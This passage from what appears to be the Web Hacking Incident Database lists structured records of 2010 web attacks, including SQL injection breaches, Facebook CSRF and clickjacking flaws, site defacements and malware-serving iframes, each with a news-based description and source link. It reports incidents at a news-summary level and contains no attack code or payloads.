Incident Description: The computer system at a local Mexican restaurant was hacked, and investigators believe thieves made off with the credit card numbers of hundreds of customers. "They know that it was a breach, and they know that the breach came from Russia, that's for sure," explained Blanca Aldaco. "So, we are working with our I.T. guy. They're definitely looking into it. Hopefully, they can figure out what the IP address is." The U.S. Secret Service and the San Antonio Police Department's Fraud Unit are also investigating. Neither would comment, but News 4 WOAI learned they are trying to track down the overseas hacker. The restaurant's owner said they have now changed the way they do business. "We are no longer on the internet when it comes to credit card authorizations," Blanca Aldaco told News 4 WOAI.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.woai.com/news/local/story/Local-restaurants-computer-hacked-customers-card/NSwj0Mpf5keeSXLOfsGvCw.cspx
Attack Source Geography: Russia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-109: Viral clickjacking 'Like' worm hits Facebook users
WHID ID: 2010-109
Date Occured: 5/31/2010
Attack Method: Clickjacking
Application Weakness: Insufficient Process Validation
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook this holiday weekend.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.sophos.com/blogs/gc/g/2010/05/31/viral-clickjacking-like-worm-hits-facebook-users/
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-108: Cyber Thieves Rob Treasury Credit Union
WHID ID: 2010-108
Date Occured: 5/20/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: Organized cyber thieves stole more than $100,000 from a small credit union in Salt Lake City last week, in a brazen online robbery that involved dozens of co-conspirators, KrebsOnSecurity has learned. According to Melgar, the perpetrators who set up the bogus transactions had previously stolen a bank employee’s online login credentials after infecting the employee’s Microsoft Windows computer with a Trojan horse program. Melgar said investigators have not yet determined which particular strain of malware had infected the PC, adding that the bank’s installation of Symantec’s Norton Antivirus failed to detect the infection prior to the unauthorized transfers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/05/cyber-thieves-rob-treasury-credit-union/
Attack Source Geography: Ukraine
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-107: Hackers Take Over BP Twitter Feed
WHID ID: 2010-107
Date Occured: 5/27/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: BP's Twitter account looked to have fallen victim to hackers early Thursday, with a post referencing a fictional character from a popular fake BP microblog page. Followers to the genuine account were told: "Terry is now in charge of operation Top Kill, work will recommence after we find a XXL wetsuit. #bpcares #oilspill."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.foxnews.com/scitech/2010/05/27/hackers-bp-twitter-feed/
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-106: AMC website vulnerable to hackers
WHID ID: 2010-106
Date Occured: 5/27/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description: With weak network security, the website http://www.egovamc.com has several chinks in its armour and is a ready invitation for hackers. The issue has been brought to the notice of senior AMC officials, and only recently did they effect a few cosmetic security patch-ups for their website. “We have reported the bugs in the website and problems with the database management system and coding. We had earlier told the systems department of the AMC about a system that can be exploited with username and password as simply ‘0’. The vulnerability has been fixed by now, but there are bigger challenges,” said Sunny Vaghela, a city-based cyber crime expert. He said that if the website is vulnerable, it means that a hacker can get access to the control panel of the site and look into contents such as tendering details, property tax details, building plans and allocation of funds, access to which is restricted to senior-level civic officials only.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://timesofindia.indiatimes.com/articleshow/5979202.cms
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-105: Poll removed due to widespread ballot stuffing and hacking
WHID ID: 2010-105
Date Occured: 5/25/2010
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Fraud
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: Dear users, yesterday we began a poll about the controversial immigration bill SB 1070 asking users what their sentiment on the bill was. It spread virally and was shared on Facebook over 500 times and viewed over 10,000 times. Unfortunately all of the attention has made it the target of some unscrupulous individuals. Around 3:00pm Tuesday afternoon we noticed that an individual was voting in the poll once every 10 seconds, and did this for nearly 2 hours. Upon checking the logs we realized there were multiple users engaging in this sort of behavior from multiple vectors, forcing us to remove the poll entirely. In terms of a long-term solution, it seems inevitable that we will adopt a system that requires a KVOA.com user account in order to vote in a poll, but that modification cannot be patched in on the fly and would require a few days' work.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.kvoa.com/news/poll-removed-due-to-widespread-ballot-stuffing-and-hacking/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-104: Code Security: MidAmerican Energy's top priority after SQL injection attacks
WHID ID: 2010-104
Date Occured: 5/21/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Energy
Attacked Entity Geography: USA
Incident Description: "Last May we had an incident where one of our web pages was exploited through an SQL injection flaw," Kerber said. "It was a wake-up call that we had vulnerabilities people could find out about."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.csoonline.com/article/594613/Code_Security_MidAmerican_Energy_s_top_priority_after_SQL_injection_attacks
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-103: SEO SPAM network - Details of the wp-includes infection
WHID ID: 2010-103
Date Occured: 5/25/2010
Attack Method: Content Spoofing
Application Weakness: Application Misconfiguration
Outcome: Link Spam
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description: We have been digging lately into a large SEO SPAM network which is using thousands of compromised sites to increase their page rankings and spread malware. They are similar to the one we reported earlier affecting lean.mit.edu, but this time they seem focused only on WordPress web sites. Attack method: all the sites infected are using the latest WordPress version and had a PHP script injected inside their wp-includes directory. The script name is random and it does two things: (1) for a search engine, it shows a bunch of keywords (cialis, viagra, movie downloads, etc.); (2) a normal user coming from Google is redirected to a web site with malware or to another site for more spam.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/05/seo-spam-network-details-of-wp-includes.html
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-102: Denver's website hacked twice in one week
WHID ID: 2010-102
Date Occured: 5/25/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: The city and county of Denver website was pulled down Monday night after it was hacked, the second such attack in a week. Eric Brown, a spokesman for the mayor's office, said he didn't know what time the site was breached and when it might be restored.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.denverpost.com/news/ci_15155519
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-101: 37 million passwords stolen on the site of Skyrock?
WHID ID: 2010-101
Date Occured: 5/21/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: France
Incident Description: A hacker broke into the huge database of the site, which had 36.7 million registered Internet users, raising fears of massive consequences. Skyrock has sent a message from its team to its Internet users. According to Zataz, the hacker may have gotten in through a security hole in the Waka platform, launched last week in partnership with the government. This ”backdoor“, which allowed anyone to edit the content of pages, had been quickly corrected. For its part, Skyrock believes that “at this stage, we cannot determine whether the Waka application was concerned.” Still, the hacker could have had access to the huge Skyrock.com database, which claimed “36.7 million active members” on February 25. However, the head of security at the site revealed to Monde.fr that at Skyrock passwords are stored in “plain” text, that is to say they are not encrypted or protected.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://whitehatfirm.com/news/37-million-passwords-stolen-on-the-site-of-skyrock/2629.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-100: Chinaz.com compromised
WHID ID: 2010-100
Date Occured: 5/25/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: China
Incident Description: Websense Security Labs™ ThreatSeeker™ Network has discovered that the speed testing site of chinaz.com has been compromised. This payload contains two parts: ap.js, and the obfuscation code in the script tag. When combined, we get the entire exploit code. After analyzing this, we noticed that it is used to target the IE vulnerability (MS10-018), which downloads an executable file named dn.exe. This has a good detection rate by most AV vendors; however dn.exe will download and execute remote files and send local information to a remote server. The process disguises itself as an AV component while at the same time suspending the AV software. At present, a bug in the malicious code fails to get the MAC address correctly and as of this alert the site is still infected.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://community.websense.com/blogs/securitylabs/archive/2010/05/25/chinaz-com-compromised.aspx
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-99: Got an iTunes account? That's music to a cyber fraudster's ears
WHID ID: 2010-99
Date Occured: 5/22/2010
Attack Method: Brute Force
Application Weakness: Insufficient Password Recovery
Outcome: Session Hijacking
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Up to 125 million people worldwide have accounts set up on the site. But computer security experts say hackers are easily hijacking accounts by pretending they are a customer who has forgotten their password. As with many websites, iTunes tells users to select a so-called 'security question' from a list of options when they first set up their account. These are fairly basic and include 'what is your mother's maiden name?' and 'where did you spend your honeymoon?'. Customers who have forgotten their passwords are prompted with the question they first selected when they set up their profile - as long as they give the correct answer, they can access the account. Security analysts claim this is leaving the website wide open to fraud. Hackers simply pretend they are a customer who has forgotten their password and can easily work out the answer to the personal question using information that users have posted on social-networking websites such as Facebook and Twitter.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.dailymail.co.uk/news/article-1280354/Got-iTunes-account-Thats-music-cyber-fraudsters-ears.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-98: Man charged with attacking O'Reilly, Coulter websites
WHID ID: 2010-98
Date Occured: 5/19/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: A former college student has been charged with using the school's computer network to control a botnet and launch distributed denial-of-service (DDoS) attacks against conservative websites belonging to Bill O'Reilly, Ann Coulter and Rudy Giuliani.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineus.com/man-charged-with-attacking-oreilly-coulter-websites/article/170524/
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-97: Microsoft files two lawsuits for "click laundering"
WHID ID: 2010-97
Date Occured: 5/20/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Abuse of Functionality
Outcome: Fraud
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description: Microsoft this week filed two lawsuits in federal court in Seattle against alleged perpetrators of a new, technologically advanced form of online advertising click fraud being dubbed "click laundering." According to Microsoft, click fraud is an online advertising scam that occurs when a person or computer program imitates a legitimate user and clicks on an online ad for the purpose of generating a fraudulent “charge-per-click,” without having any interest in the ad. Click laundering, meanwhile, is a more advanced form of click fraud designed to outwit fraud detection systems by hiding the origin of fake clicks.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineus.com/microsoft-files-two-lawsuits-for-click-laundering/article/170621/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-96: Facebook scrambles to close CSRF hole exposing private data
WHID ID: 2010-96
Date Occured: 5/19/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Facebook engineers are finishing a patch for a critical vulnerability that exposed user birthdays and other sensitive data even when they were designated as private, a security researcher said Wednesday. At time of writing, much of the CSRF (cross-site request forgery) bug appeared to have been patched, Keith said. However, as noted earlier by IDG News, attackers still could exploit the flaw to control a user's "like" functions, which are used to endorse ads and other types of content. The flaw involved a piece of code Facebook engineers dubbed "post_form_id," which is used to ensure that commands can be issued only by browsers that have previously logged into the website. Keith discovered a simple way to bypass the security token: by omitting it altogether, Facebook servers no longer attempted to validate browsers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/05/19/facebook_private_data_leak/
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.itworld.com/security/108279/facebook-fixing-embarrassing-privacy-bug
Entry Title: WHID 2010-95: Fraud Bazaar Carders.cc Hacked
WHID ID: 2010-95
Date Occured: 5/18/2010
Attack Method: Misconfiguration
Application Weakness: Improper Filesystem Permissions
Outcome: Leakage of Information
Attacked Entity Field: Hacking
Attacked Entity Geography: Germany
Incident Description: Carders.cc, a German online forum dedicated to helping criminals trade and sell financial data stolen through hacking, has itself been hacked. The once-guarded contents of its servers are now being traded on public file-sharing networks, leading to the exposure of potentially identifying information on the forum’s users as well as countless passwords and credit card accounts swiped from unsuspecting victims.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/05/fraud-bazaar-carders-cc-hacked/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-94: Hacker steals 22,000 e-mail address, demands Astley tune
WHID ID: 2010-94
Date Occured: 5/19/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: Netherlands
Incident Description: Dutch hacker Darkc0ke hijacked a radio station database containing 22,000 e-mail addresses and threatened to publish them unless the station played Rick Astley's "Never Gonna Give You Up," a variation of an Internet meme known as "rickrolling." "It was a joke," Darkc0ke said via e-mail. "They didn't play the song. Why can't they do someone a favor, just for once?" Darkc0ke said he cracked the database using a basic SQL injection to exploit a security vulnerability. The hacker is known for breaking into databases. Last year, he stole a database containing 46,000 e-mail addresses from the Dutch magazine Autoweek.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.idg.no/cw/art.cfm?id=B143BFED-1A64-6A71-CE6E57CCCFC37786
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-93: Huge 'sexiest video ever' attack hits Facebook
WHID ID: 2010-93
Date Occured: 5/18/2010
Attack Method: Rogue 3rd Party App
Application Weakness: Insufficient Process Validation
Outcome: Planting of Malware
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A huge attack by a rogue Facebook application last weekend infected users' PCs with popup-spewing adware, a security researcher said Monday. On Saturday, AVG Technologies received more than 300,000 reports of the malicious Facebook app, said Roger Thompson, AVG's chief research officer. AVG came up with its tally by counting the number of reports from its LinkScanner software, a free browser add-on that detects potentially poisoned pages. "It was stunning, really, the number," said Thompson in an interview via instant message late Monday. "And stunning that it was not viral or wormy [but that] Facebook did it all by itself." The volume of reports on Saturday's rogue Facebook software was highest during the nine-hour period between midnight and 9 a.m. Eastern, with spikes of approximately 40,000 per hour coming at 7 a.m. and noon. For the day, AVG received more than 300,000 reports, triple that of AVG's second-most-reported piece of spyware. According to Thompson, Facebook eradicated the rogue application about 15 hours after the attack started. Facebook's only acknowledgment of the attack came on its security page, where a "Tip of the Week" Monday morning read: "Don't click on suspicious-looking links, even if they've been sent or posted by friends."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com/s/article/9176905/Huge_sexiest_video_ever_attack_hits_Facebook
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-92: SQL Injection attack used in breach of 168,000 Netherlands travelers
WHID ID: 2010-92
Date Occured: 5/18/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Netherlands
Incident Description: An attacker has discovered a serious flaw in a website set up to encourage the use of smart cards for public transportation in the Netherlands, resulting in the leakage of personal information of more than 168,000 travelers. The website offered a coupon for a free trip using the OV smart card system and was set up to promote the new system which is being slowly rolled out throughout the region. According to Webwerld, a tech publication based in the Netherlands, the names, addresses and telephone numbers of individuals who signed up were publicly available as a result of the flaw. Information about the flaw was exposed by an anonymous hacker who gave the magazine a video demonstrating the error using a SQL injection attack. The hacker told the magazine that he made the flaw publicly available because there is no excuse for simple website mistakes. The website has since been taken offline.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://itknowledgeexchange.techtarget.com/security-bytes/sql-injection-attack-used-in-breach-of-168000-netherlands-travelers/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-91: Twitter software bug forces followers
WHID ID: 2010-91
Date Occured: 5/10/2010
Attack Method: Misconfiguration
Application Weakness: Insufficient Process Validation
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Twitter users had a big shock on Monday when they checked into the micro-blogging service. Their follower and following numbers were at 0, meaning they were suddenly very unpopular or something was seriously wrong with the site. It was the latter, of course. To kill a bug that allowed a user to force other users to follow him or her, Twitter temporarily reset all follower/following counts to zero, according to the Twitter Status blog. Everything was back to normal by 11 a.m. Pacific.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.pcworld.com/article/195962/
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-90: Facebook Board Member's Account Compromised
WHID ID: 2010-90
Date Occured: 5/10/2010
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Phishing
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A Facebook message sent out on Saturday from the account of company board member Jim Breyer to over 2,300 "friends" turns out to have been too good to be true. The message, an invitation to an event at which attendees would be given a "Facebook phone number," was a phishing attack, designed to capture information from recipients. The incident underscores the risk of supplying Facebook with data that might be better kept private. Facebook's appeal to cybercriminals arises from the high level of trust that users extend to Facebook messages, which are generally presumed to come from friends. Compromising someone's Facebook account also provides immediate access to a pool of new potential victims: the friends of the person whose account has been hacked.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.informationweek.com/news/software/showArticle.jhtml?articleID=224701441
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-89: Breaking News: WordPress Hacked with Zettapetta on DreamHost
WHID ID: 2010-89
Date Occured: 5/6/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description: Early this morning, we received reports that WordPress blogs were hacked on Linux shared hosting at DreamHost, as well as at other hosting companies. This is dangerous scareware which tries to install a virus on your visitors' computers. WordPress, Zencart and other PHP-based platforms were hit. Our earliest hacked site report is of 5/6/2010 @ 9:17am. This malware was just detected and is not showing up on website malware scanners yet. We have notified sucuri.net of this latest infection so that they can immediately update their malware detection systems.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-88: phpnuke.org has been compromised
WHID ID: 2010-88
Date Occured: 5/7/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description: Websense® Security Labs™ ThreatSeeker™ Network has discovered that the popular Web site, phpnuke.org, has been compromised. PHP-Nuke is a popular Web content management system (CMS), based on PHP and a database such as MySQL, PostgreSQL, Sybase, or Adabas. Earlier versions were open source and free software protected by GNU Public License, but since then it has become commercial software. As it is still very popular in the Internet community, it is not surprising that it has become a target of blackhat attacks. The injected iframe hijacks the browser to a malicious site, where through several steps of iframe redirections the user finally ends up on a highly obfuscated malicious page.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://community.websense.com/blogs/securitylabs/archive/2010/05/07/phpnuke-org-has-been-compromised.aspx
Attack Source Geography:
Attacked System Technology: PHPNuke
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-87: Facebook hacker jailed after falsely accusing boyfriend of rape
WHID ID: 2010-87
Date Occured: 5/6/2010
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A young mother who had accused her ex-boyfriend of rape hacked into his Facebook account to post a threat against herself to bolster her fakery. Zoe Williams was described as "really wicked" by the judge, who jailed her for four months. A court heard she tried to set up her ex-boyfriend after accusing him of raping her several times following the end of their five-year relationship in 2007.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.telegraph.co.uk/technology/facebook/7685381/Facebook-hacker-jailed-after-falsely-accusing-boyfriend-of-rape.html
Attack Source Geography: USA
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-86: China State News Agency Web Site Hit With Malware
WHID ID: 2010-86
Date Occured: 5/6/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: China
Incident Description: A section of the Web site for China's state-run Xinhua news agency was found to be distributing malware last month, according to a Google malware scanning service that is still labeling the site as potentially harmful. The "news center" section of Xinhua's Web site, which displays a feed of the agency's stories, was found to have one scripting exploit and one Trojan on it during a scan, according to a Google Safe Browsing diagnostic page. No suspicious content was found on the site during a scan about ten days later, but the section of Xinhua's Web site is still being labeled potentially harmful in Google search results.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.yahoo.com/s/pcworld/20100506/tc_pcworld/chinastatenewsagencywebsitehitwithmalware
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-85: Facebook flaw exposes live chats
WHID ID: 2010-85
Date Occured: 5/6/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Facebook has again come under fire for not doing enough to protect personal information after a security flaw allowed users to eavesdrop on private chat sessions. The flaw also allowed Facebook members to view other people's pending friend requests. The social networking site, which has more than 400 million active users, was forced to suspend the live chat function until engineers were able to fix the problem. The flaw was in the Facebook feature that allows users to view their own privacy settings and could be easily exploited to view others' private information, according to TechCrunch blogger Steve O'Hear, who alerted the social networking site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infosecurity-magazine.com/view/9245/facebook-flaw-exposes-live-chats/
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-84: PHP Website XSS Defacement
WHID ID: 2010-84
Date Occured: 5/2/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description: Cross-site scripting, HTML injection and redirect on bugs.php.net and phpbuilder.com. Screenshots and proof of concept: redirect from the PHP site to Google (POC) and an XSS sample (alert) on phpbuilder.com. And now what about http://doc.php.net/phd/ar/phd/ ?
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://security-sh3ll.blogspot.com/2010/05/php-website-xss-defacement.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-83: High-profile tech blog is hacked
WHID ID: 2010-83
Date Occured: 1/26/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography:
Incident Description: High-profile technology blog TechCrunch has been taken offline by hackers. A message on the site said that it had been "compromised by a security exploit" but did not specify any further details. "We're working to identify the exploit and will bring the site back online shortly," the message read. The site went down at around 0620 GMT and was replaced by various messages including a link to a site directing people towards adult material.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.bbc.co.uk/2/hi/technology/8480306.stm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-82: Victorian councils, libraries taught security in hack
WHID ID: 2010-82
Date Occured: 5/3/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Australia
Incident Description: A hacker has busted the security of eight Victorian Government websites in a string of minor attacks on Sunday. Purportedly hailing from an Indonesian hacking group, the hacker made unobtrusive defacements by inserting a text document into the homepages of six local council sites and two libraries.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.networkworld.com/news/2010/050310-victorian-councils-libraries-taught-security.html
Attack Source Geography: Indonesia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-81: Network Solutions customers hit by mass hack attack
WHID ID: 2010-81
Date Occured: 4/19/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description: Network Solutions' security team is battling a mysterious attack that has silently infected a "huge" number of the websites it hosts with malicious code. The mass compromise affects sites running WordPress, Joomla, and plain-vanilla HTML, according to reports from Sucuri Security and Stop Malvertising. Many of the infected sites include encoded JavaScript that secretly attempts to install malware on visitors' computers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/04/19/network_solutions_mass_hack/
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link: http://blog.sucuri.net/2010/04/network-solutions-hacked-again.html
Entry Title: WHID 2010-80: Hacked US Treasury websites serve visitors malware
WHID ID: 2010-80
Date Occured: 5/3/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: Websites operated by the US Treasury Department are redirecting visitors to websites that attempt to install malware on their PCs, a security researcher warned on Monday. The infection buries an invisible iframe in bep.treas.gov, moneyfactory.gov, and bep.gov that invokes malicious scripts from grepad.com, Roger Thompson, chief research officer of AVG Technologies, told The Register. The code was discovered late Sunday night and was active at time of writing, about 12 hours later.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/05/03/treasury_websites_attack/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-79: Italian expert: the attack of Romanian hackers against La Stampa and Corriere newspapers was the most relevant in the last eight years
WHID ID: 2010-79
Date Occured: 4/30/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography: Italy
Incident Description: On April 30, a group of hackers who sign as "Romanian National Security" attacked three of the most important media sites in Italy: La Stampa, Corriere della Sera and RAI. The Romanian hackers left a message inviting Italian journalists to avoid confusing Romanians with gypsies. In the last month the same group attacked the sites of the Daily Telegraph and Le Monde. However, unlike the British and French media, the Italian mass media did not mention the attack. Our HotNews.ro correspondent in Italy interviewed Matteo Cavallini, responsible for IT security in the Commerce Ministry. He was one of the first Italians to raise awareness about the attack of the Romanian hackers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://english.hotnews.ro/stiri-regional_europe-7212366-italian-expert-the-attack-romanian-hackers-against-stampa-and-corriere-newspapers-was-the-most-relevant-the-last-eight-years.htm
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-78: Butler County Election Website Hacked
WHID ID: 2010-78
Date Occured: 5/5/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: The Butler County Sheriff will investigate an alleged hacking incident that brought down election computers in that county last night, and slowed the reporting of votes. The Board of Election tells our partners at the Journal News that the problem affected the reporting of vote totals, not the counting of votes itself. The BOE says three services crashed during the incident and two unidentified sites were deliberately diverting traffic from the website. The BOE believes the attack was deliberate.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.local12.com/news/local/story/Butler-County-Election-Website-Hacked/zsQw7iXCgkuoDeMvyY3dGA.cspx
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-77: Kilpatrick's site down, spokesman suspects hackers
WHID ID: 2010-77
Date Occured: 5/5/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: USA
